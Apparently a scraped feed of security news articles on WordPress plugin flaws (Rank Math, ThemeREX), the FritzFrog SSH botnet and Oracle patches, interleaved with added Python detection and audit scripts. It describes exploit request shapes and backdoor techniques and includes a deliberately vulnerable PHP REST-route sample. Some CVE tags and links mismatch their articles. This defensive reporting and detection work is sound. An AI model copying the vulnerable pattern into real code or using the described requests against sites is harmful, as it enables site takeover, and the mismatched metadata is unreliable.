An administrator might do this to direct visitors away from pages under construction, for example.\n\nTo provide this feature, the plugin registers another REST-API endpoint, \u201crankmath/v1/updateRedirection.\u201d And, like the other vulnerability, this endpoint fails to execute a permissions check, according to Wordfence \u2013 which means that an attacker could easily create new redirects or modify existing redirects. As such, the attack could essentially be used to prevent access to almost all of a site\u2019s existing content, according to the analysis, by simply redirecting visitors to a malicious site.\n\n\u201cIn order to perform this attack, an unauthenticated attacker could send a $_POST request to rankmath/v1/updateRedirection with a redirectionUrl parameter set to the location they wanted the redirect to go to, a redirectionSources parameter set to the location to redirect from, and a hasRedirect parameter set to true,\u201d Wordfence researchers wrote.\n\nThere is, however, a caveat that accounts for the lower-severity rating of the bug: \u201cThe redirect could not be set to an existing file or folder on the server, including the site\u2019s main page,\u201d according to the analysis. \u201cThis limited the damage to some extent in that, while an attacker could create a redirect from most locations on the site, including new locations, or any existing post or page other than the homepage, they could not redirect visitors immediately upon accessing the site.\u201d\n\nPlugin developers can close this class of bug by registering a \u201cpermission_callback\u201d that checks the caller\u2019s capabilities on every REST-API endpoint; site administrators mitigate it by updating to the patched version of the plug-in.\n\nWordPress plugins continue to make headlines as weak links that can lead to website compromises. 
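Because neither `rankmath/v1/updateMeta` nor `rankmath/v1/updateRedirection` required authentication, any POST to them from outside an admin session is worth an alert, and the access log is enough to see one after the fact. The following is an added example, not Wordfence's code: the two routes come from the article, while the combined log format and the sample lines are constructed. Both the pretty form (`/wp-json/<route>`) and the `?rest_route=<route>` form that WordPress accepts are matched.

```python
"""Detect requests to the two unauthenticated Rank Math REST routes in web server logs."""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

VULN_ROUTES = {"/rankmath/v1/updateMeta", "/rankmath/v1/updateRedirection"}
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def rest_route(target):
    """Map a request target to the WordPress REST route it addresses, or None.
    Handles /wp-json/<route> and /?rest_route=<route> (percent-encoded or not)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if path.startswith("/wp-json/"):
        return path[len("/wp-json"):].rstrip("/")
    route = parse_qs(parts.query).get("rest_route")
    return route[0].rstrip("/") if route else None


def parse_line(line):
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(lines):
    """One alert per request that touches a vulnerable route. POST is the exploit
    shape Wordfence describes, so it is high severity; other methods are probes."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        route = rest_route(rec["target"])
        if route not in VULN_ROUTES:
            continue
        alerts.append({
            "ip": rec["ip"], "ts": rec["ts"], "route": route, "status": int(rec["status"]),
            "severity": "high" if rec["method"] == "POST" else "low",
        })
    return alerts


def top_sources(alerts):
    """Source IPs ranked by high-severity hits, for blocking or triage."""
    return Counter(a["ip"] for a in alerts if a["severity"] == "high").most_common()


SAMPLE_LOG = [   # constructed lines in combined log format
    '203.0.113.9 - - [01/Apr/2020:10:00:01 +0000] "POST /wp-json/rankmath/v1/updateMeta HTTP/1.1" 200 87 "-" "python-requests/2.23.0"',
    '203.0.113.9 - - [01/Apr/2020:10:00:02 +0000] "POST /?rest_route=%2Frankmath%2Fv1%2FupdateRedirection HTTP/1.1" 200 40 "-" "python-requests/2.23.0"',
    '198.51.100.4 - - [01/Apr/2020:10:05:00 +0000] "GET /wp-json/rankmath/v1/updateMeta HTTP/1.1" 404 120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Apr/2020:10:05:01 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for a in found:
        print(a)
    print("top sources:", top_sources(found))
```

A 200 on a POST to either route from an address that never authenticated is the strongest signal; after patching, the same scan over older logs tells you whether the privilege or redirect tables need to be audited for changes made while the site was exposed.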
For instance, in March, a critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nIn February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. 
\n", "cvss3": {}, "published": "2020-04-01T18:03:01", "type": "threatpost", "title": "Critical WordPress Plugin Bug Can Lock Admins Out of Websites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T18:03:01", "id": "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "href": "https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:31", "description": "A peer-to-peer (P2P) botnet called FritzFrog has hopped onto the scene, and researchers said it has been actively breaching SSH servers since January.\n\nSSH servers are pieces of software found in routers and IoT devices, among other machines, and they use the secure shell protocol to accept connections from remote computers. SSH servers are common in enterprise and consumer environments alike.\n\nAccording to an analysis from Guardicore Labs, FritzFrog propagates as a worm, brute-forcing credentials at entities like governmental offices, educational institutions, medical centers, banks and telecom companies. FritzFrog has attempted to compromise tens of millions of machines so far, and has successfully breached more than 500 servers in total, Guardicore researcher Ophir Harpaz said. Victims include well-known universities in the U.S. 
and Europe, and a railway company; and the most-infected countries are China, South Korea and the U.S.\n\n\u201cFritzFrog executes a worm malware which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk,\u201d Harpaz explained, [in a posting](<https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/>) on Wednesday. Once the server is compromised, \u201cthe malware creates a backdoor in the form of an SSH public key, enabling the attackers ongoing access to victim machines.\u201d\n\nIt also can drop additional payloads, such as cryptominers.\n\n## **Swimming in a Unique Pond**\n\nFritzFrog is a P2P botnet, meaning that it has greater resiliency than other types of botnets because control is decentralized and spread among all nodes; as such, there\u2019s no single point-of-failure and no command-and-control server (C2).\n\n\u201cFritzFrog is completely proprietary; its P2P implementation was written from scratch, teaching us that the attackers are highly professional software developers,\u201d Harpaz said. She added, \u201cThe P2P protocol is completely proprietary, relying on no known P2P protocols such as \u03bcTP.\u201d\n\nAs far as the other technical details go, Guardicore analyzed the botnet by injecting its own nodes into the mix, giving researchers the ability to participate in the ongoing P2P traffic and see how it was built.\n\nThey discovered that almost everything about FritzFrog is unique when compared with past P2P botnets: Harpaz noted that it doesn\u2019t use IRC like IRCflu; it operates in-memory unlike another [cryptomining botnet, DDG](<https://threatpost.com/p2p-ddg-botnet-unstoppable/154650/>); and runs on Unix-based machines unlike others like the InterPlanetary Storm botnet.\n\nAdditionally, its fileless payload is unusual. 
Harpaz wrote that files are shared over the network to both infect new machines and run new malicious payloads on compromised ones \u2013 and that this is accomplished completely in-memory using blobs.\n\n\u201cWhen a node A wishes to receive a file from its peer, node B, it can query node B which blobs it owns using the command getblobstats,\u201d according to the researcher. \u201cThen, node A can get a specific blob by its hash, either by the P2P command getbin or over HTTP, with the URL http://:1234/. When node A has all the needed blobs \u2013 it assembles the file using a special module named Assemble and runs it.\u201d\n\nOnce the malware is installed on a target by this method, it begins listening on port 1234, waiting for initial commands that will sync the victim with a database of network peers and brute-force targets. Once this initial syncing is finished, FritzFrog gets creative on the detection-evasion front when it comes to further communication from outside the botnet: \u201cInstead of sending commands directly over port 1234, the attacker connects to the victim over SSH and runs a netcat client on the victim\u2019s machine,\u201d according to the analysis. \u201cFrom this point on, any command sent over SSH will be used as netcat\u2019s input, thus transmitted to the malware.\u201d\n\nMeanwhile, the botnet constantly updates itself with databases of targets and breached machines as it worms through the internet.\n\n\u201cNodes in the FritzFrog network keep in close contact with each other,\u201d Harpaz noted. \u201cThey constantly ping each other to verify connectivity, exchange peers and targets and keep each other synced. The nodes participate in a clever vote-casting process, which appears to affect the distribution of brute-force targets across the network. 
Guardicore Labs observed that targets are evenly distributed, such that no two nodes in the network attempt to \u2018crack\u2019 the same target machine.\u201d\n\nFurther, it was built with an extensive dictionary of breached usernames and passwords for brute-forcing purposes, making it highly aggressive (\u201cBy comparison, DDG, a recently discovered P2P botnet, used only the username \u2018root,\u2019\u201d said Harpaz).\n\nThe malware also spawns multiple threads to perform various tasks simultaneously. For instance, an IP address in the target queue will be fed to a Cracker module, which in turn will scan the machine attached to the IP address and try to brute-force it; a machine which was successfully breached is queued for malware infection by the DeployMgmt module; and a machine which was successfully infected will be added to the P2P network by the Owned module.\n\nIn the event of a reboot of the compromised system, the malware leaves a backdoor behind, whose login credentials are saved by the network peers.\n\n\u201cThe malware adds a public SSH-RSA key to the authorized_keys file,\u201d according to the research. \u201cThis simple backdoor allows the attackers \u2013 who own the secret private key \u2013 for passwordless authentication, in case the original password was modified.\u201d\n\nThe malware also monitors the file system state on infected machines, periodically checking for available RAM, uptime, SSH logins and CPU-usage statistics. Other nodes take this information and use it to determine whether to run a cryptominer or not.\n\nIf it decides to run a cryptominer, the malware runs a separate process called \u201clibexec\u201d to mine the Monero cryptocurrency with an XMRig spinoff. 
Though this secondary infection is what the botnet has so far been used for, its architecture means that it could also install any other type of malware on infected nodes, should its authors decide to do so.\n\nIn all, FritzFrog is highly advanced, Harpaz said, but there\u2019s a simple way to ward off a compromise: \u201cWeak passwords are the immediate enabler of FritzFrog\u2019s attacks,\u201d she said. \u201cWe recommend choosing strong passwords and using public key authentication, which is much safer.\u201d\n\nAdmins should also remove FritzFrog\u2019s public key from the authorized_keys file, preventing the attackers from accessing the machine, she said. And, \u201crouters and IoT devices often expose SSH and are thus vulnerable to FritzFrog; consider changing their SSH port or completely disabling SSH access to them if the service is not in use.\u201d
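The two host-side traces the analysis describes, a public key in authorized_keys that nobody provisioned and a process listening on TCP port 1234, are straightforward to audit for. The Python below is an added example, not Guardicore's tooling: the key blobs, the key inventory and the `ss -ltnp` output are constructed sample data, and the process name p2pd is a placeholder because the article does not name the listening process. Fingerprints are computed the way `ssh-keygen -lf` reports them, so findings can be compared against whatever inventory of authorized public keys your provisioning system keeps.

```python
# Added example (not Guardicore's code): check a host for the two FritzFrog
# traces described above, an SSH public key in authorized_keys that is not in
# the fleet's key inventory, and a process listening on TCP port 1234.
# All input below is constructed sample data, not captured from a real host.
import base64
import hashlib
import re

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

# Constructed inventory of the public keys provisioning is allowed to deploy;
# in practice this comes from config management, not a literal in the script.
INVENTORY_BLOBS = [
    "AAAAB3NzaC1yc2EAAAADAQABAAAAgQDAdminKey1",
    "AAAAC3NzaC1lZDI1NTE5AAAAIBackup2",
]

# Constructed ~/.ssh/authorized_keys: two inventoried keys plus one the
# inventory does not know about (the shape of the backdoor the article describes).
SAMPLE_AUTHORIZED_KEYS = """\
# managed by config management
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDAdminKey1 admin@bastion
from="10.0.0.5" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBackup2 backup@nas
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDr0gue
"""

# Constructed `ss -ltnp` output; "p2pd" is a placeholder process name.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       128     0.0.0.0:1234         0.0.0.0:*          users:(("p2pd",pid=4242,fd=7))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""


def fingerprint(blob_b64):
    """SHA256 fingerprint in the form `ssh-keygen -lf` prints: base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (options, key_type, blob, comment) per key line.

    Option tokens such as from="..." may precede the key type, so the key type
    is located by value rather than by position."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # not a key line
        yield (" ".join(tokens[:idx]), tokens[idx], tokens[idx + 1],
               " ".join(tokens[idx + 2:]))


def unknown_keys(authorized_keys_text, inventory_blobs):
    """Return the entries whose fingerprint is not in the inventory; each is a
    candidate backdoor to remove once its absence from provisioning is confirmed."""
    allowed = {fingerprint(b) for b in inventory_blobs}
    rogue = []
    for options, key_type, blob, comment in parse_authorized_keys(authorized_keys_text):
        fp = fingerprint(blob)
        if fp not in allowed:
            rogue.append({"type": key_type, "fingerprint": fp,
                          "comment": comment, "options": options})
    return rogue


SS_LISTEN = re.compile(r"^LISTEN\s+\S+\s+\S+\s+(\S+):(\d+)\s+\S+\s*(.*)$")


def listeners_on(ss_output, port=1234):
    """From `ss -ltnp` output, return (local_address, process_field) for every
    socket bound to `port`; an unexplained listener on 1234 deserves a look."""
    hits = []
    for line in ss_output.splitlines():
        m = SS_LISTEN.match(line.strip())
        if m and int(m.group(2)) == port:
            hits.append((m.group(1), m.group(3)))
    return hits


if __name__ == "__main__":
    for entry in unknown_keys(SAMPLE_AUTHORIZED_KEYS, INVENTORY_BLOBS):
        print("unknown key:", entry)
    for addr, proc in listeners_on(SAMPLE_SS):
        print("listener on 1234:", addr, proc)
```

On a real host, feed `unknown_keys()` the contents of every user's authorized_keys (root's included) and `listeners_on()` the live output of `ss -ltnp`; a key that is absent from provisioning is exactly what the article says to remove, and the inventory comparison is by fingerprint so that it also works against keys exported from a bastion or an IdP.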
\n", "cvss3": {}, "published": "2020-08-19T20:46:31", "type": "threatpost", "title": "FritzFrog Botnet Attacks Millions of SSH Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-19T20:46:31", "id": "THREATPOST:639CADC540E81321048EB418C2EC7586", "href": "https://threatpost.com/fritzfrog-botnet-millions-ssh-servers/158489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:27:42", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\nThis introduces an access-control problem, the researcher noted. 
In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there is also logic that retrieves parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot is that an attacker can name any PHP or WordPress function in the request and have it called with attacker-supplied arguments \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. 
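Both plugin bugs on this page reduce to two source-level patterns: a REST route registered without a permission_callback (Rank Math's updateRedirection endpoint and ThemeREX's sc_layout endpoint), and, in ThemeREX, a function_exists($sc) guard followed by a call through $sc. The Python below is an added example, not code from either plugin or from Wordfence: it scans plugin PHP for those two patterns, using a constructed vulnerable sample and its hardened counterpart. The route example/v1/get/sc_layout and the functions example_rest_get_sc_layout and example_render_grid in those samples are hypothetical; register_rest_route, permission_callback, current_user_can, WP_Error and call_user_func are the real WordPress and PHP APIs.

```python
# Added example (not Rank Math's, ThemeREX's or Wordfence's code): a source
# audit that flags the two defect classes described above in WordPress plugin
# PHP, a register_rest_route() call with no permission_callback and a
# caller-supplied function name invoked behind a function_exists() guard.
# The PHP samples are constructed to model the article's description; the
# route and function names in them are hypothetical.
import re

VULNERABLE_PHP = r'''<?php
add_action('rest_api_init', function () {
    register_rest_route('example/v1', '/get/sc_layout', array(
        'methods'  => 'GET, POST',
        'callback' => 'example_rest_get_sc_layout',
        // nothing here restricts who may call the route
    ));
});
function example_rest_get_sc_layout($request) {
    $sc = $request->get_param('sc');              // attacker-controlled name
    if (function_exists($sc)) {
        return $sc($request->get_param('args'));  // any PHP function, e.g. wp_insert_user
    }
}
'''

HARDENED_PHP = r'''<?php
add_action('rest_api_init', function () {
    register_rest_route('example/v1', '/get/sc_layout', array(
        'methods'  => 'POST',
        'callback' => 'example_rest_get_sc_layout',
        // With cookie auth WordPress only sets the current user when a valid
        // X-WP-Nonce accompanies the request, so this also covers the nonce check.
        'permission_callback' => function () {
            return current_user_can('edit_posts');
        },
    ));
});
function example_rest_get_sc_layout($request) {
    $handlers = array('grid' => 'example_render_grid');   // explicit allow-list
    $sc = $request->get_param('sc');
    if (!isset($handlers[$sc])) {
        return new WP_Error('bad_layout', 'unknown layout', array('status' => 400));
    }
    return call_user_func($handlers[$sc], $request->get_param('args'));
}
'''


def _call_args(src, open_paren):
    """Text between the parentheses of the call whose '(' is at src[open_paren],
    tracking nesting. Heuristic: parentheses inside string literals count too."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return src[open_paren + 1:]


def _line_of(src, pos):
    return src.count("\n", 0, pos) + 1


ROUTE_NAMES = re.compile(r"""['"]([^'"]*)['"]\s*,\s*['"]([^'"]*)['"]""")
PERMISSION_KEY = re.compile(r"""['"]permission_callback['"]\s*=>""")
ALWAYS_TRUE = re.compile(r"""['"]permission_callback['"]\s*=>\s*['"]__return_true['"]""")


def find_unprotected_routes(src):
    """(line, route, reason) for each register_rest_route() whose arguments carry
    no permission_callback, or one that is __return_true (acceptable for public
    read-only routes, a finding for anything that writes)."""
    findings = []
    for m in re.finditer(r"register_rest_route\s*\(", src):
        args = _call_args(src, m.end() - 1)
        names = ROUTE_NAMES.search(args)
        route = names.group(1) + names.group(2) if names else "?"
        if not PERMISSION_KEY.search(args):
            findings.append((_line_of(src, m.start()), route, "no permission_callback"))
        elif ALWAYS_TRUE.search(args):
            findings.append((_line_of(src, m.start()), route, "permission_callback is __return_true"))
    return findings


DYNAMIC_CALL = re.compile(
    r"function_exists\s*\(\s*\$(\w+)\s*\)"                      # guard on a variable-held name ...
    r"(?:(?!function_exists)[\s\S])*?"                          # ... followed, before the next guard,
    r"(?:\$\1\s*\(|call_user_func(?:_array)?\s*\(\s*\$\1\b)"    # ... by a call through that variable
)


def find_dynamic_calls(src):
    """(line, variable) for each function_exists($var) guard that is then used to
    call $var(): the pattern that made every PHP function reachable."""
    return [(_line_of(src, m.start()), m.group(1)) for m in DYNAMIC_CALL.finditer(src)]


def audit(php_source):
    return {"unprotected_routes": find_unprotected_routes(php_source),
            "dynamic_calls": find_dynamic_calls(php_source)}


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_PHP), ("hardened", HARDENED_PHP)):
        print(label, audit(src))
```

To audit a real plugin, read each .php file under its directory into audit() and review the findings by hand: the parenthesis scanner does not understand PHP string literals, so it produces a review list, not a verdict. WordPress 5.5 and later emit a _doing_it_wrong notice for routes registered without a permission_callback, but the plugins at issue here predate that check, which is why a source scan of older plugin code is still worthwhile.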
Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd, earlier in February, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.
\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injection vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an 
attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the rise, with a 29 percent increase in 2017 compared to the previous year.\n\nThe [patches come](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) just weeks after Oracle OpenWorld where Larry Ellison, co-founder, executive chairman and chief technology officer of Oracle, stressed the importance of security during his keynote. Ellison also used the occasion to stress the importance of software patching in light of the [recent Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nLast month, Oracle used an advisory as an opportunity to remind users that [in April it](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>) fixed the Struts vulnerability (CVE-2017-5638) which was behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nOrganizations are falling down when it comes to patching their most important business-critical applications, Perez-Etchegoyen said.\n\nCiting a recent Ponemon Research study, Perez-Etchegoyen said fewer than half of the 600 respondents interviewed said they have a monthly plan to implement security patches for their Oracle EBS applications. Seventy percent believe it is likely their company would have a data breach due to insecure Oracle EBS applications that they have failed to secure or apply patches to.\n\nAlso part of Oracle\u2019s quarterly update are patches for its Java Platform, Standard Edition that received 22 new security fixes. 
Twenty of these vulnerabilities may be remotely exploitable without authentication, that is, they may be exploited over a network without requiring user credentials, Oracle said. The highest CVSS base score of vulnerabilities affecting Oracle Java SE is 9.6.\n\nImpacted are Java Advanced Management Console, Java SE, Java SE Embedded and JRockit.\n\nOracle Database Server received six security fixes with two of the vulnerabilities remotely exploitable without authentication. Affected Oracle Database Server components include Spatial (Apache Groovy), WLM (Apache Tomcat), Java VM, RDBMS Security, Core RDBMS and XML Database.\n", "cvss3": {}, "published": "2017-10-17T18:13:09", "type": "threatpost", "title": "Oracle Patches 250 Bugs in Quarterly Critical Patch Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10332", "CVE-2017-5638"], "modified": "2017-10-17T18:13:09", "id": "THREATPOST:0308A7143D92E14583CCD684912ABD67", "href": "https://threatpost.com/oracle-patches-250-bugs-in-quarterly-critical-patch-update/128484/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. 
The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (up to 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. 
The Solaris attacks are of particular concern since Solaris systems are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and it\u2019s public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could send a request carrying a crafted Content-Type header value and have its contents executed on the server. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched the Struts 2 flaw in 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. 
